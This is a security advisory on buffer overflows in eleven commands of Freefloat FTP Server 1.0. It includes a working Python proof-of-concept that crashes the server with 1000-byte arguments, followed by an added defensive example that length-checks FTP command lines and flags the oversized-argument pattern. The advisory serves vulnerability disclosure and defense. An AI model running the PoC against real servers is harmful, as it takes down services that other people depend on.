###############################################################################
Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities
SecPod Technologies (www.secpod.com)
Author: Veerendra G.G
###############################################################################

SecPod ID: 1019

19/07/2011 Issue Discovered
19/07/2011 Vendor Notified
           No Response From Vendor
04/08/2011 Advisory Released

Class: Buffer Overflow
Severity: High

Overview:
---------
Freefloat FTP Server Version 1.0 is prone to multiple Commands Buffer Overflow
vulnerabilities.

Technical Description:
----------------------
The flaws are caused due to input validation errors while processing DELE, MDTM,
RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. These can be
exploited by sending an overly long command argument causing the buffer to
overflow.

Impact:
-------
Successful exploitation may allow remote attackers to execute arbitrary code or
cause a denial of service condition.

Affected Software:
------------------
Freefloat FTP Server Version 1.0

Tested on:
----------
Freefloat FTP Server Version 1.0 on Windows XP SP3 En.

References:
-----------
http://secpod.org/blog/?p=310
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php

Proof of Concept:
-----------------
http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py (or see below)

Solution:
---------
Not available

Risk Factor:
------------
CVSS Score Report:
  ACCESS_VECTOR          = NETWORK
  ACCESS_COMPLEXITY      = LOW
  AUTHENTICATION         = SINGLE INSTANCE
  CONFIDENTIALITY_IMPACT = PARTIAL
  INTEGRITY_IMPACT       = PARTIAL
  AVAILABILITY_IMPACT    = COMPLETE
  EXPLOITABILITY         = PROOF_OF_CONCEPT
  REMEDIATION_LEVEL      = UNAVAILABLE
  REPORT_CONFIDENCE      = CONFIRMED
  CVSS Base Score        = 8.0 (AV:N/AC:L/Au:SI/C:P/I:P/A:C)
  CVSS Temporal Score    = 7.2
  Risk factor            = High

Credits:
--------
Veerendra G.G of SecPod Technologies has been credited with the discovery of
this vulnerability.

============================================================

#!/usr/bin/python
##############################################################################
# Title     : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities
# Author    : Veerendra G.G from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php
# Advisory  : http://secpod.org/blog/?p=310
#             http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py
#             http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt
# Version   : Freefloat FTP Server Version 1.0
# Date      : 21/07/2011
##############################################################################

import sys, socket

def exploit(HOST, PORT, CMD):
    try:
        tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        tcp_sock.connect((HOST, PORT))
    except Exception, msg:
        print "[-] Not able to connect to : ", HOST
        sys.exit(0)

    res = tcp_sock.recv(1024)
    if "220 FreeFloat" not in res:
        print "[-] FreeFloat FTP Server Not Found..."
        tcp_sock.close()
        sys.exit(0)

    tcp_sock.send("USER test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send("PASS test\r\n")
    tcp_sock.recv(1024)
    tcp_sock.send(CMD + " " + "A" * 1000 + "\r\n")
    tcp_sock.close()

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "\t[-] Usage: python exploit.py target_ip"
        print "\t[-] Example : python exploit.py 127.0.0.1"
        print "\t[-] Exiting..."
        sys.exit(0)

    HOST = sys.argv[1]
    PORT = 21

    ## Vulnerable Commands
    CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO", "STOU", "STOR",
            "SIZE", "APPE", "STAT"]

    for CMD in CMDs:
        print "[+] Connecting with server..."
        exploit(HOST, PORT, CMD)
        print "[+] Exploit Sent with %s command..." %(CMD)
        print "[+] Checking Server Crashed or not..."
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((HOST, PORT))
            s.close()
        except Exception, msg:
            print "[+] Server Crashed with %s Command" %(CMD)
            sys.exit(0)
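The input validation the advisory says is missing, as an added example that is neither SecPod's PoC nor any code from Freefloat FTP Server: a length-checking front end for FTP control-channel lines that a server would apply before dispatching the commands listed above, plus a sweep over constructed captured lines that flags the oversized-argument pattern the PoC relies on. The limits MAX_ARG_LEN and MAX_LINE_LEN, the function names and the sample session are assumptions made for this example, not values taken from the advisory or from RFC 959.

```python
import re

# Commands the advisory lists as mishandling long arguments.
VULNERABLE_COMMANDS = frozenset([
    "DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO", "STOU", "STOR",
    "SIZE", "APPE", "STAT",
])

# Assumed limits chosen for this example (not from the advisory or RFC 959):
# maximum argument length and maximum control-channel line length, both
# measured in bytes without the trailing CRLF.
MAX_ARG_LEN = 255
MAX_LINE_LEN = 512

# An FTP verb is 3 or 4 letters, optionally followed by a space and argument.
_CMD_RE = re.compile(r"^([A-Za-z]{3,4})(?: (.*))?$", re.S)


def parse_command(line: bytes):
    """Split one control-channel line into (VERB, argument_bytes).

    Returns None when the line is not ASCII or does not look like an FTP
    command. The argument stays bytes so its length is the wire length.
    """
    stripped = line.rstrip(b"\r\n")
    try:
        text = stripped.decode("ascii")
    except UnicodeDecodeError:
        return None
    m = _CMD_RE.match(text)
    if not m:
        return None
    verb = m.group(1).upper()
    arg = m.group(2) or ""
    return verb, arg.encode("ascii")


def check_line(line: bytes):
    """Decide one line before dispatch: ("accept", verb) or a rejection.

    The whole-line cap runs first, so a 1000-byte argument is refused before
    the parser touches it; the per-argument cap then covers shorter overruns.
    """
    if len(line.rstrip(b"\r\n")) > MAX_LINE_LEN:
        return "reject", "line exceeds MAX_LINE_LEN"
    parsed = parse_command(line)
    if parsed is None:
        return "malformed", "not an FTP command line"
    verb, arg = parsed
    if len(arg) > MAX_ARG_LEN:
        return "reject", f"{verb} argument of {len(arg)} bytes exceeds MAX_ARG_LEN"
    return "accept", verb


def sweep(lines):
    """Detection view: (verb, argument_length) for every line that sends an
    oversized argument to one of the advisory's vulnerable commands."""
    hits = []
    for line in lines:
        parsed = parse_command(line)
        if parsed is None:
            continue
        verb, arg = parsed
        if verb in VULNERABLE_COMMANDS and len(arg) > MAX_ARG_LEN:
            hits.append((verb, len(arg)))
    return hits


# Constructed sample session modelled on the PoC's command sequence; the
# last line is deliberately non-ASCII to exercise the malformed path.
SAMPLE_SESSION = [
    b"USER test\r\n",
    b"PASS test\r\n",
    b"PWD\r\n",
    b"RETR report.txt\r\n",
    b"DELE " + b"A" * 1000 + b"\r\n",
    b"stat " + b"B" * 300 + b"\r\n",
    b"\xff\xfe garbage\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_SESSION:
        verdict, detail = check_line(raw)
        print(f"{verdict:9} {detail}")
    print("sweep hits:", sweep(SAMPLE_SESSION))
```

The two caps are deliberately layered: the line cap bounds the worst case regardless of how the parser behaves, and the argument cap catches overruns that fit within a line but still exceed what any handler for these verbs should copy into a fixed buffer. The sweep reuses the same parser so a capture reviewer and the server front end agree on what counts as oversized.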